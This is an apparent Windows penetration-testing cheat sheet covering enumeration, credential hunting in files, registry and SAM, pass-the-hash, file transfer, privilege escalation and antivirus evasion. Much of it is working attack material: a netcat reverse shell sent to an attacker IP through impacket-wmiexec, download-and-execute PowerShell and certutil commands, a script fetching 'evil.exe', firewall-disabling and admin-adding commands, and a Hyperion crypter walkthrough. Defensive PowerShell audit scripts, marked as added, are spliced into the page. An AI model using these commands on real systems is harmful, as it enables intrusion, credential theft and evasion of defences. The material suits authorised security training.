Table of Contents
Enumeration
enum4linux
– script to gather information about a Windows server
smbmap
– List available shares
- Find Windows servers on SUBNET –
nbtscan -r SUBNET
- Basic Info –
whoami /all && ipconfig /all && netstat -an && net user && net accounts && net localgroup administrators && net share
- Test the Guest account
null session
rpcclient
– null sessions work against pre-Server 2003 and pre-XP SP2 hosts
rpcclient -U "" IPADDRESS
– Blank Password
rpcclient Commands
srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall
net use
net use \\host\IPC$ /u:"" ""
accesschk.exe
- pops up a dialog asking to accept the EULA; this is no good in a CLI-only session. Some versions accept the flag
/accepteula
- accesschk accepteula Flag – XORcat
accesschk.exe -uwcq * | findstr /v AUTHORITY | findstr /v Administrators
Search common files and registry
iconv -f utf-16le -t utf-8 < win.reg
– convert a registry dump (UTF-16) to readable format
dir /s *pass*
dir /s *cred*
dir /s *vnc*
dir /s *.config
type c:\sysprep.inf
type c:\sysprep.xml
unattend.xml / Unattended.xml (passwords are removed on workstations; they remain on servers)
https://github.com/infosec-au/fuzzdb/blob/master/attack-payloads/lfi/common-windows-files.txt
# The command below will search the file system for file names containing certain keywords. You can specify as many keywords as you wish.
C:\Windows\system32> dir /s *pass* == *cred* == *vnc* == *.config*
# Search certain file types for a keyword, this can generate a lot of output.
C:\Windows\system32> findstr /si password *.xml *.ini *.txt
# Similarly the two commands below can be used to grep the registry for keywords, in this case "password".
C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s
C:\Windows\system32> reg query HKCU /f password /t REG_SZ /s
Common Command reference
systeminfo | findstr /B /C:
– collect OS info
schtasks /query /fo LIST /v
– Scheduled tasks
tasklist /SVC
– running processes
taskkill /F /PID
– kill process
clip
– send output to clipboard
cacls
– file permissions (XP / Win7)
dir /r
– List alternate data streams
whoami /priv
– list all privileges
nltest /DCLIST:[domain]
– List Domain Controllers
findstr
regedit /e FILENAME
dump registry (in UTF-16 format)
net commands
net localgroup group_name UserLoginName /add
net user USERNAME PASSWORD /add
net user USERNAME
– user info
net group "Domain Admins" /domain
net localgroup administrators /domain
netsh
netsh advfirewall firewall add rule name="###" dir=in action=allow protocol=TCP localport=###
netsh advfirewall firewall add rule name="###" dir=in action=allow program="SOMETHING.EXE" enable=yes
netsh advfirewall set allprofiles state off
WMIC
I want to mention WMIC (Windows Management Instrumentation Command-Line) separately, as it is Windows' most useful command line tool. WMIC can be very practical for information gathering and post-exploitation. That being said, it is a bit clunky and the output leaves much to be desired.
- XP did not allow access to WMIC from a low privileged account
- Windows 7 Professional and Windows 8 Enterprise allowed low privilege users by default
Windows wmic command line command
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic useraccount get /all /format:csv
– Get all Local Windows Accounts
impacket-wmiexec testuser:testuser@10.11.1.5 "c:\nc.exe 10.11.0.52 443 -e cmd.exe"
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html
CLI Service Management
sc
– cmd service management tool
- start / stop service
sc stop SERVICE
sc start SERVICE
sc query
– list service
sc queryex SERVICENAME
– extended service information
# We can use sc to query, configure and manage windows services.
C:\Windows\system32> sc qc Spooler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Spooler
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\spoolsv.exe
LOAD_ORDER_GROUP : SpoolerGroup
TAG : 0
DISPLAY_NAME : Print Spooler
DEPENDENCIES : RPCSS
: http
SERVICE_START_NAME : LocalSystem
sc config SERVICE_NAME binpath= "C:\PATH\TO\BIN.EXE"
– change service binary path (sc requires the space after binpath=)
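The BINARY_PATH_NAME shown by sc qc is where service misconfigurations hide: an unquoted path with spaces, or a binary that non-admins can write to. The following audit script is an added example, not code from the original page; it assumes Windows PowerShell 5.1 or later and reads every service through Win32_Service.

```powershell
# Added example, not from the original page. Assumes Windows PowerShell 5.1+.
# Returns the executable portion of a service's BINARY_PATH_NAME (as shown by sc qc).
function Get-ServiceExecutable {
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }   # quoted: take the quoted part
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }  # unquoted: stop at the first .exe
    return $PathName
}

# An unquoted path containing spaces makes Windows try each space-separated prefix as the binary.
function Test-UnquotedServicePath {
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName.StartsWith('"')) { return $false }
    return (Get-ServiceExecutable $PathName).Contains(' ')
}

# Identities that should never hold write rights on a service binary.
$script:WeakPrincipals = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'

function Test-WritableByLowPriv {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($script:WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # Any write-class right for a low-privileged principal is a finding.
        if ($ace.FileSystemRights -match 'Write|Modify|FullControl') { return $true }
    }
    return $false
}

# Walk every service and report the two misconfigurations as objects.
function Get-ServiceAuditFindings {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceExecutable $svc.PathName
        if (Test-UnquotedServicePath $svc.PathName) {
            [pscustomobject]@{ Service = $svc.Name; Issue = 'UnquotedPathWithSpaces'; Path = $svc.PathName }
        }
        if (Test-WritableByLowPriv $exe) {
            [pscustomobject]@{ Service = $svc.Name; Issue = 'BinaryWritableByLowPriv'; Path = $exe }
        }
    }
}

Get-ServiceAuditFindings | Format-Table -AutoSize
```

Remediate findings by quoting the path with sc config binpath= and by tightening the binary's ACL to administrators and SYSTEM only.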
Powershell
echo COMMAND | powershell -ExecutionPolicy Bypass -NoLogo -NoProfile -
– run a command non-interactively
- Get File or directory permission –
Get-ACL {FILE|DIRECTORY} | Fl *
- Display file –
Get-Content {FILENAME}
- Encode file
$RevShell = Get-Content ./FILENAME -Raw
$bytes = [System.Text.Encoding]::Unicode.GetBytes($RevShell)
$Encoded = [System.Convert]::ToBase64String($bytes)
$Encoded | Out-File NEWFILE.ps1.b64
- Decode file
$Decode = [System.text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($Encoded))
- ZIP Decompress –
Add-Type -Assembly 'system.io.compression.filesystem';[io.compression.zipfile]::ExtractToDirectory("c:\ZIPFILE", 'c:\destination\')
- List NTFS File stream –
Get-Item -Stream * PATH
- Read NTFS file stream –
Get-Content FILENAME -Stream 'STREAMNAME'
- Set Credentials, run command as user –
$user = "administrator"; $pw = 'password'; $secpw = ConvertTo-SecureString $pw -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential $user, $secpw
Invoke-Command -ComputerName COMPUTER -Credential $cred -ScriptBlock { command }
- download powershell and execute via http –
IEX (New-Object Net.WebClient).DownloadString('URL')
- Get auto login password –
Get-RegistryAutoLogon
- Mount share –
New-PSDrive -Name "LOCALNAME" -PSProvider "FileSystem" -Root "UNCPATH"
- To Access –
cd LOCALNAME:
- Change a domain object's owner and grant reset-password rights (PowerView) –
Set-DomainObjectOwner -Identity DESTUSER -OwnerIdentity SOURCEUSER
Add-DomainObjectAcl -TargetIdentity DESTUSER -PrincipalIdentity SOURCEUSER -Rights ResetPassword -Verbose
Set-DomainUserPassword USER -AccountPassword SECURESTRING -Verbose
- get DLL Version –
(Get-Item .\FILE.dll).VersionInfo
Windows File transfer
- tftp was installed by default on Windows versions before XP / 2003; don't forget -i for binary files
atftpd --daemon --no-fork -v --logfile - /usr/share/windows-binaries/
- VBScript: use the script in the artifacts directory; acts like wget (copy in ~/scripts)
certutil -urlcache -split -f URL DESTINATIONLOCATION
FTP
- requires an interactive shell; won't work normally on a netcat shell
- you can use the -s: option to specify a file with the list of commands to be executed by the client
OPEN 1.1.1.1
USER offsec
ftp
BIN
GET nc.exe
BYE
File Transfer – Powershell
Paste the following script into the target host adjusting the url to the location of the tool(s), acts as http client
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.5/evil.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
Run Script – powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
- Encode a PS command to Base64 to avoid escaping quotations
echo -n POWERSHELLCOMMAND | iconv --to-code UTF-16LE | base64 -w 0
powershell -EncodedCommand BASE64STRING
JScript (the snippet uses JScript syntax, not VBScript; run it with cscript.exe and the URL as the first argument)
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("nc_%s.exe");
debug.exe
– an assembler, disassembler and hex-dump tool on 32-bit Windows; 64k size limit on files it can create
Process
- Compress the file
upx -9 filename
- convert the Windows PE binary to text
wine exe2bin.exe file.exe file.txt
- paste the contents of the txt file into the shell
SMB
smbclient
smbclient //server/Temp mypasswd_here -W domain -U username
– connect to share
smbclient -I IPADDRESS -L HOSTNAME -N -U USERNAME
– list shares
impacket local SMB server
impacket-smbserver
notes
- the pyinstaller module can be used to make an exe file from a python script
icacls
used to show windows file permissions
Priv Escalation
windows xp
at 01:58 /interactive cmd.exe
– use at to spawn a shell as SYSTEM
Add user to admin group
- The following C code will add a user to the local admins group on a Windows host
- should be compiled using a Windows cross compiler (e.g. i686-w64-mingw32-gcc)
#include <stdlib.h>
int main(void)
{
    /* run the net command and surface its exit status instead of discarding it */
    int rc = system("net localgroup administrators lowprivuser /add");
    return rc == 0 ? 0 : 1;
}
Links
- Privilege Escalation – Windows · Total OSCP Guide
- FuzzySecurity | Windows Privilege Escalation Fundamentals
- Windows Privilege Escalation Methods for Pentesters – Pentest Blog
- Windows Privilege Escalation Scripts & Techniques – Rahmat Nurfauzi – Medium
- Windows Privilege Escalation · OSCP – Useful Resources – links
- Passing OSCP – scund00r
- Windows Privilege Escalation Guide
- Practical Guide to exploiting the unquoted service path vulnerability in Windows – TrustFoundry
- Privilege Escalation | To Shell And Back: Adventures In Pentesting
videos
- Level Up! Practical Windows Privilege Escalation – Andrew Smith – YouTube
- Encyclopaedia Of Windows Privilege Escalation – Brett Moore – YouTube
Password Dumping
- Passwords stored in the SAM (Security Account Manager)
- SYSKEY used to encrypt SAM
- Two hash formats
- LAN Manager (LM) – DES
- NT LAN Manager (NTLM) – MD4
LM is Weak
- Passwords longer than 7 characters are split into two halves that can be cracked separately
- Converted to UPPERCASE
- Does not include a salt
- LM disabled from Vista onwards
- ‘AAD3B435B51404EEAAD3B435B51404EE’ is the blank hash
NTLM
- Case sensitive
- supports all Unicode characters
- not limited to 7 chars
- still not salted
usually displayed in LM:NTLM format
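The LM and NTLM properties above can be checked directly on a dump in LM:NTLM format. The script below is an added example, not code from the original page: it classifies pwdump/fgdump-style lines (user:rid:LM:NT:::) by whether an LM hash is still stored and whether the blank second half gives away a password of at most 7 characters, and it groups identical NT hashes, which the missing salt makes visible. The sample dump is constructed; only the blank LM value is real.

```powershell
# Added example, not from the original page. Classifies user:rid:LM:NT::: lines.
$BlankLmHalf = 'AAD3B435B51404EE'   # LM half of an empty/short password; blank LM hash is this twice

function Get-LmHashStatus {
    param([Parameter(Mandatory)][string]$DumpLine)
    $parts = $DumpLine.Split(':')
    if ($parts.Count -lt 4) { throw "not a user:rid:LM:NT line: $DumpLine" }
    $lm = $parts[2].ToUpper()
    if ($lm.Length -ne 32) { throw "LM field must be 32 hex chars: $($parts[0])" }
    $first  = $lm.Substring(0, 16)
    $second = $lm.Substring(16, 16)
    $status = 'LmStored'                                   # both halves carry password material
    if ($second -eq $BlankLmHalf) { $status = 'LmStored-PasswordAtMost7Chars' }
    if ($first -eq $BlankLmHalf -and $second -eq $BlankLmHalf) { $status = 'NoLmStored' }
    [pscustomobject]@{ User = $parts[0]; Rid = $parts[1]; LmStatus = $status; NtHash = $parts[3].ToUpper() }
}

# Accounts whose NT hashes are identical share a password: NTLM has no salt.
function Find-SharedNtHashes {
    param([Parameter(Mandatory)][object[]]$Entries)
    $Entries | Group-Object NtHash | Where-Object { $_.Count -gt 1 } | ForEach-Object {
        [pscustomobject]@{ NtHash = $_.Name; Users = ($_.Group.User -join ', ') }
    }
}

# Constructed sample dump: only the blank LM value is real, the other hex strings are made up.
$sampleDump = @(
    'Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF:::',
    'svc_backup:1001:0123456789ABCDEFAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210:::',
    'jsmith:1002:0123456789ABCDEF0123456789ABCDEF:00112233445566778899AABBCCDDEEFF:::',
    'mjones:1003:AAD3B435B51404EEAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF:::'
)

$entries = $sampleDump | ForEach-Object { Get-LmHashStatus $_ }
$entries | Format-Table -AutoSize            # svc_backup and jsmith still have LM hashes stored
Find-SharedNtHashes $entries | Format-Table -AutoSize   # Administrator and mjones share a password
```

Any account reported as LmStored means the NoLMHash policy is not enforced on that host and the password should be reset after enabling it.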
SAM files in XP
Main files are located at
C:\windows\system32\config\sam
C:\windows\system32\config\system
Need both to crack hashes
Backups located in
C:\windows\repair\system
C:\windows\repair\sam
fgdump
pwdump
and fgdump
are used to dump the SAM out of memory.
The SAM files are exclusively locked in the file system by the OS.
pwdump
- http://foofus.net/goons/fizzgig/pwdump/
- deprecated use fgdump
fgdump
- cachedumping required to be run as SYSTEM
- http://foofus.net/goons/fizzgig/fgdump/
-h remote host
-u specify user
-p user password
-l log output
-o disable password history
Windows Credentials Editor (WCE)
What is WCE?
- Tool to manipulate Windows logon sessions–Add, list, delete, modify
- Obtain credentials associated with logon sessions
Pass-the-hash (NTLM) - Pass-the-ticket (Kerberos)
Supports
- Windows XP
- Windows 2003
- Windows Vista
- Windows 7
- Windows 2008
Amplia Security – Research – Windows Credentials Editor (WCE)
wce.exe -w
VNC Password
RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: Password
TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
Value: Password or PasswordViewOnly
TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Value: Password
UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2
Read More: Crack or Decrypt VNC Server Encrypted Password • Raymond.CC
GPP
- Group Policy Preferences XML
- Encrypted with AES; the key is published on MSDN: http://blogs.technet.com/b/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx
- Need to find Groups.xml in the SYSVOL share
Pass the Hash
- Fixed or harder in 8.1 and above
- Set the SMBHASH environment variable
root@kali:~# export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
- run pth-winexe
root@kali:~# pth-winexe -U administrator% //10.11.01.76 cmd
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
AV avoidance
- Can test payloads against virustotal.com
- Methods
- Encoding Payloads using msfvenom
- Using binary crypters like Hyperion (windows)
- Writing your own, or using lesser known examples
Hyperion Example
root@kali:~# cp shell_reverse_msf_encoded_embedded.exe backdoor.exe
root@kali:~# cp /usr/share/windows-binaries/Hyperion-1.0.zip .
root@kali:~# unzip Hyperion-1.0.zip
root@kali:~# cd Hyperion-1.0/
root@kali:~/Hyperion-1.0# i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
root@kali:~/Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libgcc_s_sjlj-1.dll .
root@kali:~/Hyperion-1.0# cp -p /usr/lib/gcc/i686-w64-mingw32/6.1-win32/libstdc++-6.dll .
root@kali:~/Hyperion-1.0# wine hyperion.exe ../backdoor.exe ../crypted.exe
Exploits
GitHub – ankh2054/python-exploits: Repository for python exploits
- EternalBlue MS17-010
EternalBlue on Windows XP
Manually Exploiting MS17-010 – LMG Security
- MS08-067
scanner/smb/pipe_auditor
- MS12-037
- MS16-032
- Taviso bug
- Sysret
- upnpservice rewrite
- MS15-057 – priv esc
- Reg key AlwaysInstallElevated – all MSIs run as SYSTEM
# This will only work if both registry keys contain "AlwaysInstallElevated" with DWORD values of 1.
C:\Windows\system32> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
C:\Windows\system32> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
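The two reg query lines are easy to misread, since the setting only matters when both hives carry a DWORD of 1. The check below is an added example, not code from the original page; it assumes Windows PowerShell 5.1 or later and reads the two policy keys through the HKLM: and HKCU: drives, treating a missing key or value as "not set".

```powershell
# Added example, not from the original page: report the AlwaysInstallElevated state.
function Get-AlwaysInstallElevatedValue {
    param([Parameter(Mandatory)][ValidateSet('HKLM', 'HKCU')][string]$Hive)
    $key = "${Hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer"
    # Policy key absent: the value cannot be set in this hive.
    if (-not (Test-Path -LiteralPath $key)) { return $null }
    $item = Get-ItemProperty -LiteralPath $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }                 # key exists but value is missing
    return [int]$item.AlwaysInstallElevated
}

function Test-AlwaysInstallElevated {
    $hklm = Get-AlwaysInstallElevatedValue -Hive 'HKLM'
    $hkcu = Get-AlwaysInstallElevatedValue -Hive 'HKCU'
    [pscustomobject]@{
        HKLM        = $hklm
        HKCU        = $hkcu
        # The misconfiguration exists only when BOTH values are exactly 1.
        Vulnerable  = ($hklm -eq 1 -and $hkcu -eq 1)
        Remediation = 'Disable "Always install with elevated privileges" under Computer and User Configuration > Administrative Templates > Windows Components > Windows Installer'
    }
}

Test-AlwaysInstallElevated | Format-List
```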
- missing autoruns
autorunsc.exe -a | findstr /n /R "File\ not\ found"
- RottenPotato
- MOF
- Old exploit for Win XP
- Upload a MOF file to %SYSTEMROOT%\wbem\mof\%MOFFILENAME% and the system will auto-execute it
- Pop Pop Ret: Playing with MOF files on Windows, for fun & profit
links
- GitHub – GDSSecurity/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
- GitHub – SecWiki/windows-kernel-exploits: windows-kernel-exploits, a collection of Windows privilege escalation vulnerabilities
- GitHub – abatchy17/WindowsExploits: Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.
- Windows Kernel Exploits | Penetration Testing Lab
Post exploitation frameworks
- Empire
- GitHub – trustedsec/unicorn: Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
- GitHub – PowerShellMafia/PowerSploit: PowerSploit – A PowerShell Post-Exploitation Framework
- GitHub – samratashok/nishang: Nishang – Offensive PowerShell for penetration testing and offensive security.
Links
- harmj0y – security at the misfortune of others
- GitHub – api0cradle/UltimateAppLockerByPassList: The goal of this repository is to document the most common techniques to bypass AppLocker.
- Windows Post-Exploitation Command List – Google Docs
- How to edit the registry from the command line
- Active Directory Penetration Dojo – AD Environment Enumeration -1 – ScriptDotSh